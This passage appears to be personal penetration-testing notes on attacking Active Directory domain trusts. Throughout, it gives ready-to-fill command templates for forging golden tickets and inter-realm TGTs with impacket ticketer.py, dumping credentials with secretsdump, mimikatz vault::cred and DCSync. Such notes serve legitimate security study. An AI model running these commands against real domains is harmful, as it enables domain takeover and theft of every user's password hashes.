**Abusing Domain Trusts**
- Golden ticket
  - If a parent domain trusts us as a child domain, we can use this to create a golden ticket with SIDs in the ticket's Privilege Attribute Certificate (PAC)
  - `ticketer.py` can use `krbtgt`'s nthash to create a golden ticket
    - `ticketer.py -nthash {child_krbtgt_nthash} -domain {child_domain} -domain-sid {child_domain_sid} -extra-sid {parent_domain_sid}-519 fakeuser`
      - To get the parent domain's sid, we can use `Get-ADDomain -Identity {domain_name}`
      - To use the ticket, we may need to save it with `export KRB5CCName={path_to_ticket}`, but I think impacket will recognize it in our directory for the specified user
    - We can then use the ticket to `secretsdump` or `psexec`
      - `secretsdump.py -k -no-pass {child_domain}/fakeuser@{parent_domain_machine_name}`
- Forging inter-realm TGT
  - We can also extract the trust key and use it to create our own trust ticket
  - `ticketer.py -nthash {child_krbtgt_nthash} -domain {child_domain} -domain-sid {child_domain_sid} -extra-sid {parent_domain_sid}-519 -spn krbtgt/{parent_domain_name} fakeuser`
    - This will again yield us a golden ticket, which we can use like before with `KRB5CCName` env var set to the path of the ticket

**Getting More Credentials**
- `vault::cred /patch` will enumerate vault credentials (creds used in scheduled tasks)

## Miscellaneous
- [Group3r](https://github.com/Group3r/Group3r) is a good tool to auto-enum group policy misconfigs
- **Abusing Domain Controller Synchronization**
  - Sometimes there are multiple DCs across an environment for redundancy
    - These DCs use Directory Replication Service (DRS) to synchronize
    - DCs receiving requests for updates don't check if the request came from a known DC and only verify that the SID has the correct privileges
    	- This means that we just need a user with the correct privileges
    	- *Required privileges*: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes in Filtered Set 
    		- Owned by Domain Admins, Enterprise Admins, and Administrators by default
      - If we have `WriteDACL` on the domain via a group, we can give ourselves the necessary permissions
  - Performed with `mimikatz` on domain-joined machine 
  	- This gives us a way to get the hash of any domain user
  	- `lsadump::dcsync /user:{domain}\{user}` 
  - Can also be performed with `impacket-secretsdump` on kali
  	- `impacket-secretsdump -just-dc-user {target_domain_user} {domain}/{admin_username}:"{password}"@{DC_IP}`
  	- `impacket-secretsdump -hashes :{NTLM_hash} {domain}/{user}@{DC_IP}`
